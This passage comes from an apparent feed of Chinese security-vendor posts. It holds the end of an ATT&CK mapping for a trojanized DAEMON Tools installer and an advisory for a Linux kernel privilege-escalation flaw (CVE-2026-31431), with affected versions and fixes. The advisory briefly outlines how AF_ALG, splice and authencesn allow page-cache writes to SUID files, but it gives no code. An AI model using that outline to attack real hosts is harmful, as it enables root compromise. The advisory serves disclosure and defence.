rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:none;mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(255,255,255);border-color:#d6d6d6;"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">T1204.002</span></span></p></td><td data-colwidth="265" width="274" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">用户运行受污染的安装包</span></font></span></p></td></tr><tr><td data-colwidth="143" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:1.0000pt solid rgb(0,0,0);mso-border-left-alt:0.5000pt solid rgb(0,0,0);border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:none;mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(255,255,255);border-color:#d6d6d6;"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Persistence</span></span></p></td><td data-colwidth="221" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:none;mso-border-left-alt:none;border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:none;mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(255,255,255);border-color:#d6d6d6;"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Registry Run Keys</span></span></p></td><td data-colwidth="133" valign="center" style="padding:0.0000pt 5.4000pt 0.0000pt 5.4000pt;border-left:none;mso-border-left-alt:none;border-right:1.0000pt solid rgb(0,0,0);mso-border-right-alt:0.5000pt solid rgb(0,0,0);border-top:none;mso-border-top-alt:0.5000pt solid rgb(0,0,0);border-bottom:1.0000pt solid rgb(0,0,0);mso-border-bottom-alt:0.5000pt solid rgb(0,0,0);background:rgb(255,255,255);border-color:#d6d6d6;"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">T1547.001</span></span></p></td><td data-colwidth="265" width="274" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">通过注册表实现自启动</span></font></span></p></td></tr><tr><td data-colwidth="143" width="182" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Defense Evasion</span></span></p></td><td data-colwidth="221" width="267" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Subvert Trust Controls</span></span></p></td><td data-colwidth="133" width="128" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">T1553.002</span></span></p></td><td data-colwidth="265" width="274" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt medium;border-style:none solid solid none;border-color:#d6d6d6;background:rgb(255, 255, 255);"><p style="text-align:center;layout-grid-mode:char;mso-pagination:widow-orphan;vertical-align:top;"><span style="font-family:Arial;mso-fareast-font-family:宋体;color:rgb(51,51,51);font-style:normal;font-size:11.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">利用合法的数字签名逃避检测</span></font></span></p></td></tr></tbody></table></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">参考链接</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;" data-pm-slice="0 0 []"><span leaf="">1.<a href="https://securelist.com/tr/daemon-tools-backdoor/119654/" target="_blank">https://securelist.com/tr/daemon-tools-backdoor/119654/</a></span></p><p style="word-break: break-all;"><span leaf="">2.<a href="https://www.bleepingcomputer.com/news/security/daemon-tools-trojanized-in-supply-chain-attack-to-deploy-backdoor/" target="_blank">https://www.bleepingcomputer.com/news/security/daemon-tools-trojanized-in-supply-chain-attack-to-deploy-backdoor/</a></span></p></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b35f5f20&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525496%26idx%3D3%26sn%3D4b2ee8a0630c8f3ccd827f1e5ba79bf7">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 06 May 2026 21:45:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】Linux Kernel Copy Fail 本地权限提升漏洞(CVE-2026-31431)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525464&amp;idx=1&amp;sn=8acda386bfbde5ad1c91b714adbca8f2</link>
      <description>2026年4月30日，深瞳漏洞实验室监测到一则Linux Kernel组件存在权限提升漏洞的信息，漏洞编号：CVE-2026-31431，漏洞威胁等级：高危。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-04-30 16:55</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=dd2137f4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FAPc6NwjLsxQ9Nvibm0iaEticpDolrn5rqsiaSkC9ulTWUDBw8cLcDONIyY0KDrTUBUDRVtLTic3FQ0bP0fPXrV7IOpibqv0guLibXENalwCV240nHg%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年4月30日，深瞳漏洞实验室监测到一则Linux Kernel组件存在权限提升漏洞的信息，漏洞编号：CVE-2026-31431，漏洞威胁等级：高危。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041786" data-ratio="0.16635687732342008" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="gif" data-w="1076" src="https://wechat2rss.xlab.app/img-proxy/?k=ffa1de63&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTbvcJWLVvO2CkCicUAqQyGb2susjV4wZ4gDq9KnrDsYlrLtCtm26zh86owhOSnKgDrRSM81BiabNcccCZg2yrZ4lD4WtvnCsmQo%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Linux Kernel Copy Fail 本地权限提升漏洞(CVE-2026-31431)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Linux Kernel</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ubuntu 24.04(LTS 6.17.0-1007-aws 及以下)</span><span leaf=""><br/></span><span leaf="">Amazon Linux 2023(6.18.8-9.213.amzn2023 及以下)</span><span leaf=""><br/></span><span leaf="">Red Hat Enterprise Linux 10</span><span leaf=""><br/></span><span leaf="">Red Hat Enterprise Linux 9</span><span leaf=""><br/></span><span leaf="">Red Hat Enterprise Linux 8</span><span leaf=""><br/></span><span leaf="">SUSE 16(6.12.0-160000.9-default 及以下)</span><span leaf=""><br/></span><span leaf="">Debian / Arch / Fedora / Rocky / Alma / Oracle等同期内核版本均受影响</span><span leaf=""><br/></span><span leaf="">受影响的内核提交范围：</span><span leaf=""><br/></span><span leaf="">commit 72548b093ee3 ≤ version &lt; commit a664bf3d603d</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">权限提升</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：需要用户认证</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：默认配置</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：本地</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：中等，需要本地低权限执行条件。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，可提升至root权限。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041785" src="https://wechat2rss.xlab.app/img-proxy/?k=f2e3fd6d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQFOLfKib1kMObiaNibCEzgDnDO7baibyugwnlhT8XKicfFpNyhJVVjxIypF7435XSZ2icMwgHiaxXqm8DZgnfbePxqalagfJbq5Ij1ibs%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Linux内核（Linux Kernel）是一个开源的操作系统内核，它是Linux操作系统的核心组件，负责管理计算机的硬件资源，并提供了许多系统服务，如进程管理、内存管理、文件系统管理和设备驱动程序等。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041787" src="https://wechat2rss.xlab.app/img-proxy/?k=ad306355&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSymrCyRF5IaB1h4368ogndmcfp0YS5hBj32wexkxWJC4qhVM7UWtQwl1uBQL4nNGBJ1Mx1ra6SNslC6obdet662DMTEAOTnls%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年4月30日，深瞳漏洞实验室监测到一则Linux Kernel组件存在权限提升漏洞的信息，漏洞编号：CVE-2026-31431，漏洞威胁等级：高危。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Linux Kernel 的加密子系统 algif_aead 在处理 AEAD 接口的 in-place 操作时存在逻辑缺陷。该问题与 2017 年引入的 commit 72548b093ee3 有关，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">攻击者在具备本地低权限账户的情况下，可通过 AF_ALG、splice 与 authencesn 解密路径触发对文件 page cache 的可控写入，从而可能篡改只读文件或 SUID 程序在内存中的缓存内容，最终造成本地权限提升。该漏洞不能单独远程利用，但在共享主机、CI Runner、容器/多租户环境中风险较高。官方修复方式是回退 algif_aead 中不必要的 in-place 操作逻辑，并改为直接复制关联数据。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Ubuntu 24.04(LTS 6.17.0-1007-aws 及以下)</span><span leaf=""><br/></span><span leaf="">Amazon Linux 2023(6.18.8-9.213.amzn2023 及以下)</span><span leaf=""><br/></span><span leaf="">Red Hat Enterprise Linux 10</span><span leaf=""><br/></span><span leaf="">Red Hat Enterprise Linux 9</span><span leaf=""><br/></span><span leaf="">Red Hat Enterprise Linux 8</span><span leaf=""><br/></span><span leaf="">SUSE 16(6.12.0-160000.9-default 及以下)</span><span leaf=""><br/></span><span leaf="">Debian / Arch / Fedora / Rocky / Alma / Oracle等同期内核版本均受影响</span><span leaf=""><br/></span><span leaf="">受影响的内核提交范围：</span><span leaf=""><br/></span><span leaf="">commit 72548b093ee3 ≤ version &lt; commit a664bf3d603d</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041788" src="https://wechat2rss.xlab.app/img-proxy/?k=d3ab1ba3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxRVjPBfTt4INoIK7d3JRURQmibkvL7ZicNmCDwEaepXFBpc2uWWwHFicBNHyicbjVvD5C5ZbxmNQwPXeDGksIyDpNWe96A5v6ZEhY8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布最新版本修复该漏洞，建议受影响用户更新到最新版本。</span><span leaf=""><br/></span><span leaf="">下载链接：<a href="https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5" target="_blank">https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041784" src="https://wechat2rss.xlab.app/img-proxy/?k=a9838d1b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQRYwKQC5NCWyBppcEG1hgPjtBibEzD1k2KicQgY09ox09rWdQvVKY9ez1eiaL0vHwiaT6UiaIGgicXrrguia3iarMhNric34LsQeNEeW6c%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p></li></ul><ul style="list-style-type: disc;" 